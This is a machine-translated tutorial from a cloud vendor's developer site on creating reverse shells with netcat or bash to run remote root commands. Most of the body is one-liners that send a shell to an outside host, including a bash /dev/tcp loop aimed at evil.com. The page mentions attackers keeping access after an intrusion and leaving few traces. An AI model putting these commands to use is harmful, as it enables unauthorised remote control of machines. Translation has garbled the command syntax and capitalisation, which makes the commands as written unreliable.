Home > Developer > Linux

Use NetCat or BASH to create a reverse Shell to execute remote Root commands

Source: Internet
Author: User
Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more >

Reverse shell (Reverse shell) is a technology that sends shell commands to remote machines. This technology becomes very useful when remote machines are behind firewalls and other things. You may say, "isn't a common shell or simple SSH channel capable of implementing this ?" No, it cannot be implemented. On the Internet, I see many people cannot tell the difference between a common shell and a reverse shell. Before starting the following content, we should clarify these concepts.

Reverse Shell (Reverse Shell)

  • Reverse shell is used by a remote computer to send its shell to a specific user, rather than binding the shell to a port. The latter is inaccessible in many environments. In this way, you can run the root command on the remote server.

Bind Shell

  • The bind shell is used by the user to bind the shell to a local port, so that anyone can send commands in the local network.

Reverse shell is often used by hackers to do some illegal activities. For example, after a server is intruded into, they will set up a reverse shell so that they can easily access this remote computer through this shell in the future. I believe that you will not use it to do such a thing.

Environment requirements

  • Remote Unix host
  • Netcat installed

Use NetCat for reverse shell interaction

After logging on to the remote host through shell, the following command can easily send the shell to your machine:

 
 
    
  
  
  1. Nc-c/bin/sh <your IP> <Any unblocked port>
    2.

You can even use netcat to pipe BASH.

 
 
    
  
  
  1. /Bin/sh | nc <your IP> <Any unblocked port>
    2.

Then listen to the shell:

 
 
    
  
  
  1. Nc-l-p <same port>-vvv
    2.

Reverse shell through BASH

This technology is used when the remote machine does not have netcat or you want to do something unnatural without leaving too many traces.

Listen to shell:

 
 
    
  
  
  1. Nc-l-p <Any unblocked port>-vvv
    2.

Create a new Descriptor and assign it to a network node. In this way, we can read and write this descriptor.

 
 
    
  
  
  1. Exec 5 <>/dev/tcp/evil.com/<same port> $ cat <& 5 | while read line; do $ line 2> & 5> & 5; done
    2.

Or another reverse shell:

 
 
    
  
  
  1. 0 <& 196; exec 196 <>/dev/tcp/<your IP>/<same port>; sh <& 196> & 196 2> & 196
    2.

In this way, you can easily send any command through netcat.

[How to Create a Reverse Shell to Remotely Execute Root Commands Over Any Open Port Using NetCat or BASH]

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

Related Keywords:
shell script to login to multiple servers and execute commands unix bash shell commands how to execute shell script command to execute shell script where to execute sql commands how to reverse square root how to execute shell script in unix

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

What's Trending
Top 10 Tags
datastax versions naming convention zookeeper client class definition md5 microsoft sql server 2005 data structures exception handling error handling
Top 10 Keywords
microsoft download center down wordpress address url site address url wordpress address url windows installer 4 0 download 302 not found web address url definition site address url wordpress db2 integer mac os installation step by step pdf abbreviation for return

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

  • Sales Support

    1 on 1 presale consultation

    Chat Contact Sales

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    Open a Ticket

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

    Learn More